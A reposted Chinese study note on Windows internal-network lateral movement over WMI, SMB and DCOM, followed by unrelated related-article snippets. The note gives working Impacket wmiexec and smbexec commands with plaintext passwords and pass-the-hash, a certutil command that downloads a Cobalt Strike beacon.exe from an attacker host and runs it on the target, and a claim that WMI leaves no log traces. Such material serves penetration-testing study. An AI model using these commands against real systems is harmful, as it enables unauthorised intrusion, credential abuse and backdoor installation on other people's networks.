第179-180天:横向移动篇入口切换SMB共享WMI管道DCOM组件Impacket套件CS插件

news/2025/11/2 17:59:43/文章来源:https://www.cnblogs.com/JuneC/p/19184130

学习的目的

windows 2012以上默认关闭了Wdigest,所以攻击者无法通过内存获取到明文密码
为了针对以上情况 所以有四种方法解决:
1.利用(PTH,PTK)等进行移动不需要明文
2.利用其他服务协议(SMB/WMI等进行哈希移动)
3.利用注册表开启(wdigest auth)进行获取、
4.利用工具或者第三方平台(HASHCAT进行破解获取)
image

WMI

WMI全称"windows管理规范",从win2003开始一直存在。它原本的作用是方便管理员对windows主机进行管理。因此在内网渗透中,我们可以使用WMI进行横向移动,支持用户名明文或者hash的方式进行认证,并且该方法不会在目标日志系统留下痕迹。
利用条件:
1、WMI服务开启,端口135,默认开启。
2、防火墙允许135、445等端口通信。
3、知道目标机的账户密码或HASH。

wmi横向移动的使用:wmiexec-impacket (主要使用方法)

python wmiexec.py sqlserver/administrator:admin!@#45@192.168.3.32
python wmiexec.py sqlserver/administrator:admin!@#45@192.168.3.32 "whoami"
python wmiexec.py -hashes :518b98ad4178a53695dc997aa02d455c sqlserver/administrator@192.168.3.32 "whoami"
下载后门:
python wmiexec.py sqlserver/administrator:admin!@#45@192.168.3.32 "certutil -urlcache -split -f http://192.168.3.31/beacon.exe c:/beacon.exe"
执行后门:
python wmiexec.py sqlserver/administrator:admin!@#45@192.168.3.32 "c:/beacon.exe"

通过wmic 进行后门上线,这边的主机名和用户名是通过前期的信息收集收集而来的
image

SMB服务

SMB服务通常由文件服务器提供,它允许客户端计算机通过网络访问服务器上的共享资源。通过SMB用户可以在网络上访问和共享文件夹、文件以及打印机,从而实现在不同计算机之间方便地共享数据和打印输出。利用SMB可通过明文或HASH传递来远程执行。
利用条件:
1、文件与打印机服务开启,默认开启。
2、防火墙允许135、445等端口通信。
3、知道目标机的账户密码或HASH。

利用方法
法一,smbexec-impacket

外部:(交互式)
python smbexec.py sqlserver/administrator:admin!@#45@192.168.3.32
python smbexec.py -hashes :518b98ad4178a53695dc997aa02d455c sqlserver/administrator@192.168.3.32

法二4.CS插件:
cs-psexec
SMB横向移动:
推荐使用impacket和CS插件
image

image

IIS服务器的目录 c:\inetpub\wwwroot
image

通过wmic 进行后门上线,这边的主机名和用户名是通过前期的信息收集收集而来的
image

有可以直接进行交互式的工具以及CS的插件cscript(不建议使用)

SMB横向移动:
推荐使用impacket和CS插件
image

image

dcom是通过powershell进行利用的,只有windows7(windows server8)以后的版本才有powershell,并且需要关闭防火墙,比较鸡肋。

实战当中,要去分析防火墙限制了什么协议,然后再来选择通过上面方式进行横向移动
像SMB这种就需要开放文件和打印机共享,怎么判断限制了什么协议,就可以直接使用impacket里面的代码进行攻击,成功的话就是可以

电脑是默认打开文件和打印机共享的,所以正常是可以使用SMB进行横向移动的
image

主要注意几个点:
(1)使用命令攻击时计算机名需要写入,分清域内用户和域外用户
(2)wmi,smb,dcom三个横向手法所需要的条件,并且要学会什么时候使用什么协议进行攻击,也就是用impacket进行探测,探测成功后进行使用
(3)掌握明文和非明文(hash)的攻击方法
(4)掌握计算机名的信息收集,主要是通过spn收集,systeminfo,net view /domain

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/953718.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

游记 CSP-S2025

CSP-S 2025 广州市第六中学海珠校区 2025.11.1游记 CSP-S 2025 初赛 初赛太难了,没有满分。感觉出题人已经换了几次了,这次的题目显然有歧义或漏洞,选手要猜测出题人的想法,这一点也不好,例如我错的那道题就是这样…

VRP基本配置命令

1. 远程配置system-view # 系统视图 sysname AR1 # 重命名设备 interface G... 0/0/1 # 配置接口 ip address 192.168.1.1 24 # 设置ipuser-interface vty 0 4 # 允许同时5个人可以进入调试本台设备。5个窗口 au…

2025 年 11 月 CBN 砂轮厂家最新推荐:结合剂迭代 + 精度优化,高耐用产品选购指南

工业磨削领域对 CBN 砂轮的耐用性与适配性需求日益严苛,结合剂性能与加工精度成为核心考量指标。本次推荐依托行业权威协会 2025 年度专项测评结果,测评覆盖 40 余家源头厂家,采用 “四维十二项” 量化评估法 —— …

Newton迭代法-----牛顿迭代法求解高次方函数的近似根

Newton迭代法-----牛顿迭代法求解高次方函数的近似根牛顿迭代法是一种通过不断用函数切线逼近根的数值方法,核心优势是收敛速度快,常用于求解方程 f(x)=0 的实根,但对初始值选择有要求。 一、基本原理:从几何角度理…

2025 年 11 月 CBN 砂轮厂家最新推荐:磨料优化 + 工艺升级,高适配产品选购指南

当前工业磨削领域对 CBN 砂轮的性能要求持续提升,磨料纯度、工艺精度直接影响加工效率与成品质量。本次推荐基于行业权威协会最新测评数据,测评覆盖 30 余家源头厂家,通过 “三维九项” 评估体系筛选 —— 从技术维…

解码LVGL样式

LVGL 样式系统:核心组成与特性 样式是控制控件外观(颜色、圆角、字体等)的核心机制,其设计围绕 “部件针对性控制”“状态动态切换” 和 “高效复用管理” 三大原则展开。 样式核心组成 样式部件(Part):控件的 …

2025 年 11 月 CBN 砂轮厂家最新推荐:磨粒精筛 + 工艺焕新,高稳定产品选购指南

工业磨削作业对 CBN 砂轮的稳定性与磨削效率要求不断提高,磨粒纯度与生产工艺成为关键影响因素。本次推荐基于行业权威协会 2025 年第三季度专项测评结果,测评覆盖 50 余家源头厂家,采用 “三维十项” 科学评估体系…

设备调试基础实验

ping -6 www.baidu.com # 使用ipv6平百度华为路由器: pwd # flash:/ 根目录 dir # 等于ls mkdir # 创建文件夹 rmdir # 删除文件夹 rename 文件名 新文件名 # 修改文件名 copy 文件 文件 # 复制文件 move # 移…

20231302邱之钊密码系统设计实验二一

《密码系统设计》实验二 在 Ubuntu或openEuler中(推荐 openEuler)中调试运⾏商⽤密码检测中⼼https://www.scctc.org.cn/xzzx/sfydm/ydmxz/提供的源代码,⾄少运⾏SM2,SM3,SM4代码。使⽤GmSSL命令验证你代码的正确…

2025 年 11 月运动木地板厂家最新推荐,成分精纯与效能升级!—— 产能、专利、环保三维数据透视

体育场馆建设对运动木地板的成分精纯度与综合效能要求不断提高,市场上部分产品存在原材杂质多、环保不达标等问题,影响使用安全与场馆寿命。为筛选优质品牌,本次推荐从产能、专利、环保三维度开展测评。产能维度核查…

2025 年 11 月运动木地板厂家最新推荐,配方精研与效能焕新!—— 实力品牌深度解析采购无忧之选!

运动木地板的配方设计与效能表现,直接决定体育场馆的使用体验与安全系数。当前市场部分品牌存在木材配方不合理、性能参数不达标等问题,增加采购风险。为挖掘实力品牌,本次测评从品牌实力核心维度开展:核查品牌成立…

2025 年 11 月运动木地板厂家最新推荐,成分焕新与效能强化!—— 精准检测与稳定性能深度解析

当下体育场馆对运动木地板的成分品质与性能稳定性要求持续提升,市场中部分产品存在木材纤维结构松散、减震效能衰减等问题,给运动安全与场馆运营带来隐患。为筛选优质品牌,本次推荐联合专业检测机构,依据国际运动地…

【软考】信安中级密码学专题

针对信安中级里,密码学相关案例题的知识点和真题密码学的三大目标 ‌Confidentiality 机密性(保密性):确保信息未经非授权的访问,避免信息泄露。 Integrity 完整性:防止信息非法的修改和毁坏,…

算法 第二次作业

算法 第二次作业找第k小的数的分治算法(快速选择算法) 自然语言描述: 选择一个元素作为“基准”:从数组中选择一个元素作为基准,选择的方法可以有多种,例如随机选择、选择数组的第一个元素、选择数组的中间元素等…

JavaScript异步编程:从回调地狱到优雅解决方案

异步编程是JavaScript的核心能力,但回调嵌套易导致"回调地狱"。本文将介绍现代JS异步处理的演进之路,助你写出更简洁高效的代码。1. Promise:异步操作的基石 Promise 通过链式调用解决回调嵌套问题: fet…

使用JavaScript和Node.js构建简单的RESTful API

引言:本文将指导你如何使用JavaScript和Node.js的Express框架构建一个简单的RESTful API。我们将创建一个简单的用户管理系统,包括获取用户列表、添加新用户以及删除用户。 正文与代码演示:设置项目:首先,创建一个…

JavaScript中的闭包:原理、应用与代码

在JavaScript的众多概念中,闭包(Closure)无疑是一个既深奥又强大的特性。闭包不仅能够帮助我们封装私有变量,实现模块化编程,还能在函数之间传递状态,使得函数的行为更加丰富和灵活。本文将深入探讨闭包的原理,…

2025 年 11 月 PVC 地板厂家最新推荐,聚焦原料安全与功效稳定的专业产品解析

PVC 地板因适用场景广泛,全球市场需求逐年攀升,但原料安全不达标、功效随使用波动等问题,让采购方面临决策难题。为解决这一痛点,国际地材专业测评协会联合材料安全机构,参照氨糖行业对原料安全、功效稳定的专业评…

2025 年 11 月 PVC 地板厂家最新推荐,聚焦原料合规与功效持久的专业产品解析

PVC 地板全球市场需求旺盛,但原料不合规、功效随使用周期快速衰退等问题,成为采购方核心顾虑。为提供科学选购依据,国际地材合规测评协会联合材料性能机构,参照氨糖行业对原料合规、功效持久的专业评估标准,开展 …

2025 年 11 月 PVC 地板厂家最新推荐,聚焦成分安全与功效持续的优质产品解析

PVC 地板在全球各场景广泛应用,但成分安全隐患、功效随使用衰减等问题频发。为解决采购痛点,国际地材安全测评协会联合材料研究机构,参照氨糖行业对成分安全、功效持续的严格标准,开展 2025 年 11 月 PVC 地板专项…